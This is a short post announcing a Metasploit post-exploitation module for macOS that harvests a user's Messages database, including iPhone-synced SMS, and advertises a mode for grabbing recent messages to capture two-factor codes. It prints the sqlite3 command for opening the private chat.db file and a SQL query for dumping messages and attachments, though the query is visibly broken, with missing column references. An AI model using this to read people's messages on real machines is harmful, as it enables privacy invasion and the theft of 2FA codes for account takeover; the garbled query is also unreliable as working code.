My new module for metasploit which was submitted today has two great advantages. Firstly, it gives you the ability to download all messages from an OSX machine which by default syncs with the users iPhone and includes SMS messages. Secondly, the LATEST action gives you the ability to grab the latest messages in an easy to read format - particularly useful for 2 factor authentication(2FA).

While I was looking at OSX’s Messages for another project I found out that all message data is stored in a simple SQLite3 database format in the users library. Below is the command line to open this file and a SQL query to read the messages in a nicer format.

sqlite3 ~/Library/Messages/chat.db
SELECT datetime( + strftime("%s", "2001-01-01 00:00:00"), "unixepoch", "localtime")  || " " || 
case when m.is_from_me = 1 then "SENT" else "RECV" end || " " || || ": " || m.text, a.filename 
FROM chat as c 
INNER JOIN chat_message_join AS cm ON cm.chat_id = c.ROWID 
INNER JOIN message AS m ON m.ROWID = cm.message_id 
LEFT JOIN message_attachment_join AS ma ON ma.message_id = m.ROWID 
LEFT JOIN attachment as a ON a.ROWID = ma.attachment_id 
INNER JOIN handle usr ON m.handle_id = usr.ROWID 

This has been packaged up to make it easier to use in the metasploit module post/osx/gather/enum_messages.

Pull request for metasploit.